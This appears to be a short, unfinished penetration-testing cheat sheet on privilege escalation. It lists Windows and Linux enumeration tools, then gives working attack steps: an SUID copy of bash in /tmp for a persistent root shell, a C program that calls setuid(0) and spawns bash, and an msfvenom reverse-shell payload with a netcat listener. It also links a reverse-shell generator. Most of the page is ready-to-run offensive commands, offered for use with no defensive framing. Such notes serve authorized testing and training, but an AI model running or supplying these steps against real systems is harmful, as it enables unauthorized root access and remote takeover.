Privilege Escalation
Windows
./winPEASany.exe quite serviceinfo
./SharpUp.exe
Linux
linEnum.sh --> https://github.com/rebootuser/LinEnum
lse.sh --> https://github.com/diego-treitos/linux-smart-enumeration
before run, set History Terminal to line = 5000
then just execute linEnum and review it carefully.
Spawning Root Shell
rootbash -> SUID
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
spawn the root shell
/tmp/rootbash -p
Custom Executable
If some root process executes another process which you can control (modified or put your binary file)
int main() {
setuid(0);
system("/bin/bash -p");
}
compile using:
gcc -o <name> <file.c>
msfvenom (reverse shell)
generate elf file using msfvenom
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
listening on the attacking machine:
nc -lvnp <port>
Native Reverse Shells
Use this tool to generate reverse shell in any language:
https://github.com/mthbernardes/rsg
Will be update soon
Last updated